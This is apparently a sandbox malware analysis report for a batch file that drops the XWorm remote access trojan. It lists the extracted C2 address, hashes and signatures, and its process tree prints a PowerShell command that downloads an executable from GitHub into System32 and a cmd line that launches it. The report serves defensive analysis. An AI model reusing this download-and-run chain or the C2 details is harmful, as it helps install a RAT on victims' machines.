Overview

overview

10

Static

static

1

echooff.bat

windows7-x64

8

echooff.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    93s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/03/2025, 20:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    echooff.bat

  • Size

    809B

  • MD5

    da0c105256eccbca5772fb173b5a313f

  • SHA1

    db0583cd2282aec4f414763cf22d677ec7073f76

  • SHA256

    fb4ce395283d4dcc0632cddf7ab374aff3e3a03e2871364ea419ddc8deecaad4

  • SHA512

    ea2b97998c20ed28f874b83bd15fccfd82dc34a6655988d121c833e5c0352cb4d23c4be1312c0a6863d3629a7d8957de2560fc9be42dfe22c375f937ccee894d

Score
10/10
xwormdefense_evasionexecutionprivilege_escalationrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

137.184.74.73:5000

Mutex

fEkivyZANGvej5MK

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

    execution
  • Downloads MZ/PE file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
    defense_evasionprivilege_escalation
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\echooff.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3552
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5 | find /i "MD5 hash"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3964
      • C:\Windows\system32\certutil.exe
        certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5
        3⤵
          PID:3400
        • C:\Windows\system32\find.exe
          find /i "MD5 hash"
          3⤵
            PID:3052
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/main/tes.exe' -OutFile 'C:\Windows\System32\tes.exe'"
          2⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:720
        • C:\Windows\system32\cmd.exe
          cmd /min /C "set __COMPAT_LAYER=runasinvoker && start "" "C:\Windows\System32\tes.exe"
          2⤵
          • Access Token Manipulation: Create Process with Token
          • Suspicious use of WriteProcessMemory
          PID:4348
          • C:\Windows\System32\tes.exe
            "C:\Windows\System32\tes.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:4452

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qb4a5vcj.q3t.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Windows\System32\tes.exe
        Filesize

        32KB

        MD5

        4fc044304cc6300f4c616587d81b0244

        SHA1

        2497c2a35feba85a5e7500e86f24d78b959b31b0

        SHA256

        882693e145705dcc3ecc52d5fd5187cdf3ae6da1c67af12e229746b0d64e9454

        SHA512

        d5298d83decffcca0f188b8c1a186ecbc85a8427da7feb618b403d24bb7ad05727068ed841f83bc3f1cda1cf8a56ed4fa3733e6c4731623c2e6e36675d4aa40e

        Download Submit

      • memory/720-0-0x00007FFEA0013000-0x00007FFEA0015000-memory.dmp

        Filesize

        8KB

        Download

      • memory/720-1-0x0000027CB8EE0000-0x0000027CB8F02000-memory.dmp

        Filesize

        136KB

        Download

      • memory/720-11-0x00007FFEA0010000-0x00007FFEA0AD1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/720-12-0x00007FFEA0010000-0x00007FFEA0AD1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/720-16-0x00007FFEA0010000-0x00007FFEA0AD1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4452-20-0x0000000000CE0000-0x0000000000CEE000-memory.dmp

        Filesize

        56KB

        Download